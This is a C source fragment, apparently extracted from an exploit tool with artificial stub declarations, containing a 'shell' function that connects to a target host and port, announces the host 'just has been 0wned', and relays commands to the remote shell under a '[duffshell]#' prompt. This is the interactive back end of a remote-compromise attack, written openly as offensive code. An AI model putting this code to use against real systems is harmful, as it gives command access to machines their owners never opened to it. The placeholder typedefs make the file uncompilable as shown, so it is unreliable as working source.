
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef char u_char ;
struct sockaddr_in {int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int fd_set ;
typedef int buf ;
typedef int a ;


 int AF_INET ;
 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int IPPROTO_IP ;
 int SIGINT ;
 int SIG_IGN ;
 int SOCK_STREAM ;
 int br ;
 int close (int) ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int fprintf (int ,char*,...) ;
 int handler () ;
 int htons (int) ;
 int memset (char*,int ,int) ;
 int read (int,char*,int) ;
 int select (int,int *,int *,int *,int *) ;
 int signal (int ,int ) ;
 int socket (int ,int ,int ) ;
 int stderr ;
 int step (char*,int) ;
 int strlen (char*) ;
 scalar_t__ strstr (char*,char*) ;
 int write (int,char*,int ) ;

int shell(char *host, int port, struct sockaddr_in ad)
{
 u_char buf[4096];
     fd_set fds;
 int sock;
 struct sockaddr_in a=ad;

 sock = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);

 a.sin_family = AF_INET;
 a.sin_port = htons(port);

 if((connect(sock,(struct sockaddr*)&a,sizeof(a)))<0){
    step("couldn't connect\n",-1);
    close(sock);
    if(!br)
     handler();
    else return 0;
 }
 signal(SIGINT,SIG_IGN);
 fprintf(stderr,"\n--< %s just has been 0wned\n\n",host);
        for (;;){
  FD_ZERO(&fds);
  FD_SET(0, &fds);
  FD_SET(sock, &fds);
  fprintf(stderr,"\033[31m[duffshell]#\033[0m ");
  select(255, &fds, ((void*)0), ((void*)0), ((void*)0));
  memset(buf, 0, sizeof(buf));

  if (FD_ISSET(sock, &fds)){
   read(sock, buf, sizeof(buf));
   fprintf(stderr, "%s", buf);
  }
  if (FD_ISSET(0, &fds)){
   read(0, buf, sizeof(buf));
   if(strstr(buf,"exit")){
    fprintf(stderr,"\n");
    return 1;
   }
   write(sock, buf, strlen(buf));
  }
 }
}
